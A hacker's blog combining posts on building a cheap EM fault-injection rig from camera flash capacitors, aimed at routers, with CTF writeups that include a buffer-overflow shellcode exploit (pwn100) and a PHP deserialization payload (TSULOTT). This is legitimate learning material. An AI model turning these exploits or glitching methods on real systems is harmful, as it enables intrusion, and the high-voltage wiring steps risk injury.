EM Fault Injection on a Budget (Part 2)

In my last post on this topic, I explored the possibility of building an EM fault injection rig for home experimentation. In this post, I will discuss my progress, an initial exploration of the attack surface of two live targets, and next steps.

Remember – fooling around with high-voltage capacitors can injure or kill you – but nothing wagered, nothing gained.

Device Improvements

The first step of my exploration was to modify the glitching platform to a more portable form, resulting in the following:

This is a somewhat safe and simple circuit, utilising a thyristor to “dump” the capacitor’s charge through the coil, and optocouplers / MOSFETs to control charge and discharge. Unfortunately, the above device looks like a dirty hack job, due to two mistakes I made:

  • Firstly, the thyristor was placed on the wrong end of the load. I didn’t realize this would be a problem until I noticed a significant reduction in the strength of the magnetic field generated (read: the distance it was able to shoot a nail). The thyristor *must* be between the negative end of the capacitor and your coil, or you will lose power.
  • Secondly, I had used a gate resistor on the MOSFET instead of a gate-source resistor. You *must* have a gate-source resistor if you are using a MOSFET to enable charging: otherwise, your capacitor will be charged to something other than 0V when you are expecting 0V, leading to an exceptionally painful shock.

This circuit also includes a simple plug-and-play interface for the installation of a capacitor bank, allowing adjustment of the voltage to suit your target.

With this step complete and tested (using an Arduino to fire a small piece of metal programmatically as the test case), I moved on to the next part of this adventure.

Coil Design

The next stage was to improve the coil. The goal was to create a targeted yet strong magnetic field, which would impact the function of transistors inside an IC without greatly impacting the rest of the device.

Some theory (the Biot–Savart law) exists about this, a simplified form of which is as follows:

(On a side note – the red ink above is actually Iroshizuku Momiji; the shitty lighting really doesn’t do it justice).
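For reference, the usual textbook simplification – the field at the centre of a flat coil of N turns and radius R carrying current I – works out to:

B = \frac{\mu N I}{2R}

where \mu is the permeability of whatever the coil is wound around, which is why the choice of core material matters so much (more on that below).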

In practice, this is a black art, with different sources claiming different levels of effectiveness for different coil designs. I followed in the footsteps of the folks at Red Balloon Security, in their recent presentation at RECon. By attempting to induce a second-order glitch, I could be happy with an entire component failing temporarily and still get the result I want, making the constraints on the coil *much* more relaxed.

I first attempted to work with the coil from my previous post, though with limited success – I was unable to make it reliably and repeatably glitch a production device. This was an “air core” coil – going back to the above, it should be noted that the permeability of a ferromagnetic core is many, many times that of air.

I had most success with a hand-wound coil like this, utilizing approximately 25 turns of high-gauge wire across an 8mm core:

Initial Success and Failure

Using this coil, I am able to repeatedly and reliably generate a second-order glitch by impeding the functionality of components on two D-Link routers (DSL2880AL and DSL2750U). On the DSL2880AL, I am able to repeatedly crash the Ethernet controller by hand at a capacitor charge level of approximately 160–180V:

I was also able to crash a DSL2750U device by targeting the main MCU. This is displayed in the screenshot above: using this positioning, we can reliably generate a system halt (but no fancy screencap). I believe I may be able to induce a similar fault against the Flash memory chip to more refined effect, but have not yet instrumented this process.

Next Steps

At this point, I should mention that the implications of this type of thing are tremendous: it gives us both an exploratory tool and a way to intentionally fail a discrete operation at a time of our choosing. Attacks which blur the line between hardware and software have always held a special place in my heart, and the vast abyss that is my life is somewhat brightened by the opportunity to play in this space.

Several improvements to this device are still needed. The ones I can think of are:

  • The device needs a faster charge cycle, and the ability to cycle multiple capacitors. I’m not sure whether the switching time of something like an IGBT is fast enough to “switch off” a magnetic field (or whether that would even make sense, in terms of the effect it would have on a transistor… or in the mechanism of discharging the capacitor).
  • The device is currently driven by an Arduino, but the timing is not sufficiently controlled – an FPGA should be used (triggered by the Arduino to wait, then trigger the optocoupler to fire the device) in addition to the existing controller mechanism. To this end, I am learning Verilog (hardware constraint files can go fuck themselves – I spent an hour messing around today until I realized I had forgotten to define the clock).
  • The device needs some kind of voltage level sensor that’s more accurate than a single red status LED. This should feed back to the control mechanism, so I can measure voltage using something more accurate than guesswork and a hard-coded set of data points.
  • Once a voltage sensor is in place, the entire rig should be encased in something so that I can’t accidentally shock myself anymore.

Recently, I have spent a significant amount of time learning various attacks and discovery methods against hardware – learning to “ride the bus”, as it were. From here, this project becomes a lower priority: I will spend time learning general hardware security / tampering, and then come back to better utilize EM glitching as a tool.

See you all in this weekend’s CTFs.


Writeups – asby, abuse mail (Late) (SHA2017)

This weekend, I participated in the SHA2017 CTF. I solved one challenge in the time available, and a second shortly after, unfortunately too late to score anything. The writeups are presented below.

asby

The “asby” challenge was presented as a Windows binary file, which you can download here. A hint was provided – that we could “asby” the flag out.

Upon initial inspection, we quickly notice an interesting string usage, which indicates a sequential check against the flag:

I immediately applied the principle of “brute force, best force” against the application’s stdout, but trickery was afoot: a brute-force search indicated that “0” was the correct first character of the flag, but manually checking with a flag of “01” showed that “0” was not the correct first character.

We then inspect the logical flow of the application. We can use IDA’s graph mode to identify what appears to be a character check:

Following the disassembly backwards, we note that a character is loaded at 0x40179d, and an “xor key” seems to be loaded at 0x401789 (the source of “ecx” in the above). The two characters are xor’ed together, then xor’ed with 0x2a, and compared with a value in al.

We can use windbg to inspect the state of the executable, breaking at the above two addresses and inspecting the strings loaded:

We then break at the final address of 0x4017A7, to identify what’s being compared against what:

Following the disassembly backwards, we can see that al comes from the first characters of the two loaded strings above xor’ed together, then xor’ed with 0x2a, while 0x4B is the first character of our input (“a_123”) xor’ed with 0x2a.

We then build a quick Python script to take the two strings above, xor them together, and xor the result with 0x2a, which you can download here.
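The core of it is just this (the two strings below are placeholders – substitute whatever windbg shows at the two load addresses):

# the strings loaded at 0x401789 / 0x40179d, as dumped with windbg
# (placeholder values - use the real ones from the debugger)
s1 = b"................"
s2 = b"................"

partial_flag = bytes(a ^ b ^ 0x2A for a, b in zip(s1, s2))
print(partial_flag.decode(errors="replace"))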

Unfortunately, this only brings us a part of the flag:

At this point, I wondered if an initial “failsafe” check had been put in place to prevent naive brute forcing, and whether it would be left alone if we provided part of the correct key. I modified my original brute force script to include the first part of the correct key, and to create a new process for each brute force attempt, as I knew that a maximum of 100/115 tries was permitted before the process died – this revealed the flag in short order:

You can download the final Python script here.
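For illustration, the shape of that brute forcer is roughly the sketch below – the invocation and the success test are placeholders, since they depend on how you run the Windows binary and how it reports a correct prefix:

import string
import subprocess

KNOWN = "flag{"                        # the prefix recovered from the xor step (placeholder)
CHARSET = string.ascii_letters + string.digits + "_}"

flag = KNOWN
while not flag.endswith("}"):
    for c in CHARSET:
        guess = flag + c
        # a fresh process per attempt, since the binary only permits a
        # limited number of tries before it exits
        p = subprocess.run(["asby.exe"], input=guess.encode(),
                           capture_output=True, timeout=10)
        if b"correct" in p.stdout:     # placeholder: key off however the binary reports progress
            flag = guess
            break
    else:
        break                          # no character extended the prefix - stop
print(flag)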

Abuse Mail (Late Writeup)

The “Abuse Mail” challenge was presented as a zip file containing three packet captures, which you can download here.

Our initial inspection reveals “abuse01.pcap” to contain some telnet data followed by an IPsec connection, while the other pcaps contain some manner of data encoded within ICMP ping packets. We begin our analysis by recovering the IPsec tunnel keys, to allow us to decode the tunnel. We can get these from the telnet session:

This reveals the IPsec tunnel to be hiding an HTTP connection. Browsing the connection stream shows the installation of a backdoor at /tmp/backdoor.py. Fortunately, the full file is provided in the IPsec tunnel:

as well as the command line used to launch it (revealing the AES key):

From here, we can easily reverse engineer the backdoor script to allow us to decode the streams encoded in the “abuse02.pcap” and “abuse03.pcap” packets. Here, I took two shortcuts – firstly, as the data was encoded as a string, I simply ran strings across the pcaps and filtered for “SHA2017”. Secondly, I did some “duct tape debugging”: when I couldn’t decode a packet, I simply tried trial and error with the base64 padding, instead of attempting to understand the protocol and its hazards fully.
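The “duct tape” part boils down to something like this – keep appending padding until the decode stops complaining:

import base64
import binascii

def b64decode_forgiving(s):
    # try decoding with 0-3 '=' characters appended
    for pad in range(4):
        try:
            return base64.b64decode(s + "=" * pad)
        except binascii.Error:
            continue
    return None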

You can download this decoder here.

We start off by decoding abuse02.pcap, which you can download here. We immediately note the presence of a private key, and save it:

Finding little else of significant interest, we proceed to abuse03.pcap, which appears to contain responses to the “getfile” command. My initial attempt at decoding this file met with failure, as I simply pasted the data chunks in chronological order. Going back to the original Python backdoor, we note that each “getfile” chunk comes in the following form:

getfile:<cnt>:data

Where “cnt” is an incremental counter. We note that some “cnt” values are repeated, so we separate the chunks out into two separate files (I actually got here by happy accident – I initially just filled an array with chunks, keyed to the “cnt” field – this generated one of the files, but with extra data at the end, leading to the second).
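The reassembly logic, once the chunks are decoded, is roughly the following (the chunks list is assumed to already hold the decrypted getfile payloads, in capture order):

import re
from collections import defaultdict

def reassemble(chunks):
    files = defaultdict(dict)                 # file index -> {cnt: data}
    for chunk in chunks:
        m = re.match(rb"getfile:(\d+):(.*)", chunk, re.DOTALL)
        if not m:
            continue
        cnt, data = int(m.group(1)), m.group(2)
        idx = 0
        while cnt in files[idx]:              # a repeated cnt means a second transfer
            idx += 1
        files[idx][cnt] = data
    return [b"".join(f[cnt] for cnt in sorted(f)) for _, f in sorted(files.items())]

The first of the two files turns out to be a USB packet capture: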

We know from the USB descriptor (and Google’s boundless wisdom) that this is in fact a HID keyboard. The actual “keypress” data is stored in URB_INTERRUPT packets, as follows:

We can use “tshark” to spit out the capture data from URB_INTERRUPT packets (or rather, the packets with extra capture data, corresponding to our keystroke packets) as follows:

tshark -r out.pcap -T fields -e usb.capdata

Taking the output from this, we can refer to the USB HID standard, and map these packets to actual keystrokes. A quick Python script does the job, which you can download here. The keys typed are as follows:

The caret characters represent the shift key, so the unzip password in this case is “Pyj4m4P4rtY@2017”.
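For reference, the guts of the mapping look like this. Boot-protocol reports are one modifier byte, one reserved byte, then up to six keycodes; this sketch only handles the first keycode and only uppercases letters on shift, so shifted symbols like “@” still need a second lookup table:

# HID usage IDs 0x04-0x38, indexed straight into a string
HID_KEYS = "----abcdefghijklmnopqrstuvwxyz1234567890\n\x1b\b\t -=[]\\#;'`,./"

def decode_report(capdata):
    # capdata: one usb.capdata value from tshark, e.g. "02:00:13:00:00:00:00:00"
    report = bytes.fromhex(capdata.replace(":", ""))
    modifier, keycode = report[0], report[2]
    if keycode == 0 or keycode >= len(HID_KEYS):
        return ""
    char = HID_KEYS[keycode]
    shift = bool(modifier & 0x22)             # left/right shift modifier bits
    return char.upper() if shift else char

The example report above decodes to “P” – the first character of the password.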

We then return to the other file which we were able to extract from abuse03.pcap, which is a TLS-encrypted stream. Using the private key we recovered earlier, we can save “secret.zip” from the stream:

Decoding it with the password captured from the USB packet capture reveals the flag:

As always, thanks to the SHA2017 CTF organisers for putting together a fun and challenging event – I was not expecting a 300-point challenge to be this in-depth.

See you all in the HackIT CTF in two weeks’ time!


Writeups – rev75, SimplePHP, pwn100 (Bugs Bunny CTF)

This weekend, I participated in the curiously named Bugs Bunny CTF (www.bugsbunnyctf.me). Unfortunately, due to very poor record-keeping (and general incompetence in solving some more interesting challenges) on my part, I am only able to present a few limited writeups.

rev75

rev75 was presented as a 64-bit Linux binary file, which you can download here. At first glance, this is a stock standard reverse engineering challenge, with a simple string comparison leading to a flag. However, trying this reveals that the challenge goes further:

Going back into IDA Pro, we can notice a multitude of functions which seem to do something with base64-encoded blocks, as well as two functions (“encrypt” and “decrypt”):

Calling these functions in gdb doesn’t seem to do anything, so we go for our next best option – we extract the base64 blobs (in the order they appear in the binary), join them together, and try to make sense of the output.
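Something along these lines does the job (the binary name is a placeholder, and if each blob is padded individually you would need to decode them one at a time instead of joining first):

import base64
import re
import subprocess

# pull printable strings out of the binary and keep the base64-looking ones,
# in the order they appear
out = subprocess.run(["strings", "rev75"], capture_output=True, text=True).stdout
blobs = [s for s in out.splitlines() if re.fullmatch(r"[A-Za-z0-9+/=]{16,}", s)]
with open("out.png", "wb") as f:
    f.write(base64.b64decode("".join(blobs)))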

The output appears to be a valid PNG file: unfortunately, it doesn’t render, and strings doesn’t show anything obvious. We then head for our trusty 010 Editor PNG template:

010 Editor quickly reveals that the last IDAT chunk stretches past the end of the file. Scrolling to the end of the file reveals an IEND chunk, and a quick ctrl-F doesn’t show any more IDAT chunks – my next step is to manually tweak the size of the last chunk. A little bit of math later, and we arrive at a size of 6039, which ends the IDAT data exactly where the IEND chunk begins.
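That arithmetic (and the patching) can be scripted – a sketch below, where the chunk offset is a placeholder to be read out of the 010 template. Note the chunk CRC is left wrong, which is part of why the image renders broken:

import struct

IDAT_OFFSET = 0x1234                # placeholder: offset of the oversized IDAT's length field
data = bytearray(open("out.png", "rb").read())
iend = data.rfind(b"IEND")
# the IDAT data starts 8 bytes after its length field (4 length + 4 type) and
# must end 8 bytes before the "IEND" tag (4-byte IDAT CRC + 4-byte IEND length)
new_len = (iend - 8) - (IDAT_OFFSET + 8)
struct.pack_into(">I", data, IDAT_OFFSET, new_len)
open("fixed.png", "wb").write(data)

The result is a broken image, but one that’s good enough to scavenge the flag from: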

SimplePHP

The SimplePHP challenge was presented as a website, with accompanying source code, which you can download here.

This challenge introduced me to the PHP concept of a “variable variable”. That is:

$a = 1;
$b = "a";
$$b = 2;     // writes to the variable named by $b, i.e. $a
echo $a;     // prints 2

My initial attempt was to set the $flag variable to something I controlled, then send a “flag” POST variable – this got me to the “200” response, but didn’t give me the flag. Thinking a bit further, I noted the _200 and _403 variables – what if I could use one of these to “store” the $flag variable, then trigger a controlled response?

pwn100

The “pwn100” challenge was presented as a Linux binary, which you can download here.

After some initial analysis in IDA Pro and some trickery in gdb, we know that this is a simple stack-based overflow, with the vulnerable function in plain sight:

With a little trial and error, we’re able to control EIP. Unfortunately, we don’t know where our vulnerable buffer is on the target – but a little bit of inspection in gdb reveals that the location of our buffer is in eax:

A quick detour into Ropper (I’m sure PEDA also has an option for finding it), and we identify a clean control transfer to eax at 0x08048386. We set this as our return address, modify some standard /bin/sh shellcode to clean up the stack first (so that its “push” instructions don’t clobber the shellcode itself), and we’re in business:

You can download the completed exploit here.
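For reference, a pwntools-style sketch of the idea – the offset, the stack adjustment and the local invocation are all assumptions, and the real exploit is in the download above:

from pwn import *

context.update(arch="i386", os="linux")

OFFSET = 76                              # placeholder: distance from buffer start to saved EIP
JMP_EAX = 0x08048386                     # control transfer to eax, found with Ropper

# move esp out of the way first, so the shellcode's own pushes
# don't land on top of it
shellcode = asm("sub esp, 0x40") + asm(shellcraft.i386.linux.sh())
assert len(shellcode) <= OFFSET

payload = shellcode.ljust(OFFSET, b"\x90") + p32(JMP_EAX)

io = process("./pwn100")                 # or remote(host, port) against the live service
io.sendline(payload)
io.interactive()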

I’d like to thank the organisers of Bugs Bunny CTF for an enjoyable event – a shame that the timing was such that fully half the challenges were added while I could not play, due to the thrice-accursed misfortune of having to wake up for a 9am meeting on Monday. At the time of writing, these challenges appear to still be online, so I will attempt to devote some time this week to completing more of these challenges.

See you all in SHA2017 CTF next weekend.


EM Fault Injection on a Budget

Following on from my earlier successes with glitching, I have continued investigating various methods to induce faults in hardware. One less-talked-about method is EM fault injection, which relies on discharging a capacitor to create a brief, strong magnetic field that can influence the state of transistors (and other electronics).

My test device is not complete – I have built the hardware, but I do not yet have the components I need to drive it with something programmable. However, this is a lot of fun, and thus worth writing about.

WARNING: This post involves high-voltage capacitors. Do not fuck with them. Also, the legality of this may be unclear depending on where you live: always act in accordance with the laws and statutes of your land. Be safe, be ethical, leave no trace behind.

Theory

There is some limited previous literature on this topic, mostly in academia:

The best practical reference I can find for this is from Riscure, which sells a commercial EM glitching workstation.

This is similar to the voltage glitching technique described in a previous post: however, instead of diverting a power supply, this uses a temporary strong magnetic field to induce unexpected electrical activity, affecting the state of various components (e.g. a transistor). This can be expressed in the following diagram:

This is the same principle as a coil gun: by generating a strong, temporary magnetic field, you can “throw” a projectile through a coil. The device we will build is effectively a less powerful version of a typical coil gun, as the intent is not actually to throw a projectile, but to induce faults in otherwise securely implemented hardware.

Implementation – Coilguns 101

I started off by purchasing two FujiFilm “QuickSnap” disposable cameras last week. These are popular in Australia, and can be purchased from camera stores, convenience stores and apparently Officeworks. I disassembled the case, making sure not to enable the flash functionality, and to discharge the capacitors:

You can safely discharge this by touching both ends with a piece of metal (hold it by something insulated – don’t touch the bare metal). If you did it right, you should see and hear a spark.

Once this is done, bend the capacitor away from the flash bulb, and then let’s get soldering:

Solder thusly:

  • The red box is the “flash enable” switch, which is activated with a toggle switch on the front of the camera case. Solder this closed (as if this were permanently enabled).
  • The blue box is the “flash trigger” switch, which is a contact switch that turns on when you press the shutter. Solder this closed (as if you were always pressing the camera trigger).
  • The maroon box is the flash bulb contacts. Desolder the flash bulb, and in its place, solder two pieces of wire, which we’ll leave unconnected for now.

If you have trouble desoldering the flash bulb, try washing the existing connection with solder flux first, then melting some lead solder “onto” it: the existing blob of solder should insta-melt (possibly because the lead lowers the melting point of whatever the fuck that is?). Poke it with a piece of desoldering braid to “soak up” the blob of solder.

Now, take a portion of enameled wire / winding wire, and loop it around something a few times. I started off with a matchstick, like this:

At this point, you can begin testing the device. Remember those two wires we left disconnected in the last step? Connect one to one end of your coil, and leave the other free. We will discharge the capacitor by connecting the free end of the coil to the free wire from the flash bulb terminal.

Charge your capacitor by inserting the battery, as per the original battery installation (the short end of the battery enclosure corresponds to the negative terminal on the battery itself). You should hear a soft whining sound, followed by a red LED slowly lighting up – it’s next to the capacitor. When this is lit, charging is complete.

Then, position your coil close to something ferromagnetic (I used a screw), and complete the circuit (without touching any conductive surfaces). You should see (and hear) another spark where you complete the circuit, and the screw should move, indicating glorious success.

Inducing Faults

The next step is to induce a fault in an Arduino microcontroller. For this step, I used a Freetronics Eleven (https://www.freetronics.com.au/products/eleven), but anything you have lying around should do. Position your coil above the MCU:

Then, run a counting loop on your target device, and start trying to induce faults. There is no science to this: too many factors come into play (strength of the magnetic field, duration, positioning of the coil, orientation of the coil, etc). In doing this, I was never able to induce a meaningful fault, but I could cause the device to crash:

Emboldened by what appeared to be a success, I continued experimenting with this technique.
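Detecting a fault is easiest from the host side – just watch the counter for gaps or silence. A minimal pyserial sketch (the port, baud rate and output format are assumptions about the target sketch):

import serial                            # pyserial

port = serial.Serial("/dev/ttyUSB0", 9600, timeout=2)
last = None
while True:
    line = port.readline().strip()
    if not line:
        print("no output for 2s - target probably crashed or reset")
        last = None
        continue
    try:
        value = int(line)
    except ValueError:
        print("garbled output:", line)   # corrupted serial traffic counts as a glitch too
        continue
    if last is not None and value != last + 1:
        print("counter skipped: {} -> {}".format(last, value))
    last = value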

Glitching Rig Improvements

I proceeded to improve my test setup by modularising the device – I wanted the device to be portable, as well as plug-and-play: I should be able to add or remove capacitors to adjust the strength of the magnetic field generated. To do this, I desoldered the original capacitor (as well as the battery pack), and soldered header cables onto everything, so I could use a breadboard to adjust portions of the device:

The final glitching device looks like this – in this configuration, we have wired up two capacitors in parallel for additional power, and the coil is replaced with an entire spool of 0.25mm wire.

I also experimented with the configuration of the coil in relation to the device, and I found the following configuration to produce the most reliable glitches:

Similar to regular glitching, this process is unreliable, but I was able to produce some crashes semi-consistently, as well as some interesting effects, like the below:

Next Steps / Thoughts

The implications of this are significant – while unreliable, this allows us to attack hardware when only limited interaction is possible (e.g. it’s in a difficult-to-reach setup). We can simply point our coil / antenna at it and discharge a capacitor through it. Several factors hold us back:

  • Capacitors have a charge time, and are the limiting factor in how many tries per minute we get, regardless of how well we automate everything else. Given that glitching is already imprecise, our success rate will be low by definition (so this puts this technique somewhat in the “for fun” territory without serious investment, I think).
  • The variety of possible coils is immense – there doesn’t seem to be a single guide on how to build a glitching coil (I hear 20 turns around a needle?); different people have different methods.
  • There is a fine line between glitching and irreparably bricking a device. The number of things that could go wrong is tremendous, and this is less “controlled” than voltage glitching, which is confined to denying power for a portion of a clock cycle, generally against a single component.

The next steps of this project are to wait for the arrival of an optocoupler and a thyristor – these should allow the use of a programmable device to control charging (a regular MOSFET should work) as well as to trigger the coil safely. A power MOSFET may be needed for fast switching “off” of the coil as well, but that can just be a lift-and-shift in place of the thyristor.

I am keen to hear of other people’s successes or failures with this technique. If you’ve experimented with this, and had some success, please do let me know – I’m keen to learn how I can improve this setup to more reliably generate glitches, and use them “meaningfully” no less.

Have a safe and ethical week!


Writeup – TSULOTT (meepwn)

Over the past weekend, I spent a little time participating in the meepwn CTF. Unfortunately, during the time allocated, I was only able to solve a single challenge, and the simplest challenge at that. On the bright side, it was a PHP deserialization vulnerability, which I have not yet written about.

My writeup is below.

TSULOTT

The TSULOTT challenge was presented as a web page, which appears as follows:

To use this website, you can enter six numbers in the “code” section below, and generate a base64-encoded “code”. You then enter this “code” into the top input box – if you guessed six random numbers correctly, you presumably get the flag. My first step was to inspect the source code:

Making a request with the is_debug parameter set spits out the formatted source in the page. You can download the source here.

The logical flow of the vulnerable code is as follows:

  • A base64 “code” is submitted and unserialized into $obj
  • Six random numbers are generated, stored into the $obj->jackpot property
  • The $obj->enter property is compared with $obj->jackpot
  • If the two are equal, you get a flag.

An “object” class is also defined in the source code:

class Object 
{ 
 var $jackpot;
 var $enter; 
}

The path to exploitation lies in creating a fake object, called something else (not “Object”, which seems to cause PHP to use its own class definition), which passes the “$obj->enter === $obj->jackpot” check, but doesn’t allow $obj->jackpot to be overwritten. Helpfully, PHP allows us to define “protected” properties, which cannot be modified from outside the class, as per below:

class Test {
    protected $_data = array(
        "jackpot" => "12345"
    );
    var $enter;
}

We can then quickly create our own PHP script, which instantiates a “Test” object, seeds the $enter variable, serializes it, and base64-encodes it, revealing the flag:

You can download the solution here.
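If you’d rather not spin up PHP, the payload can also be hand-rolled – a Python sketch of what the serialized, base64-encoded object looks like is below. Protected members get a “\0*\0” prefix in PHP’s serialize() output; the property values here are placeholders:

import base64

def php_str(s):
    return 's:{}:"{}";'.format(len(s), s)

enter = "12345"                                   # placeholder value
payload = (
    'O:4:"Test":2:{'
    + php_str("\x00*\x00_data")
    + 'a:1:{' + php_str("jackpot") + php_str("12345") + '}'
    + php_str("enter") + php_str(enter)
    + '}'
)
print(base64.b64encode(payload.encode()).decode())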

As always, I’d like to thank the meepwn team for creating this CTF – this challenge was a lot of fun, as was the “Be Human” challenge (text CAPTCHA recognition), which I was unable to solve in the allocated time.

See you all in the SHA2017 CTF!
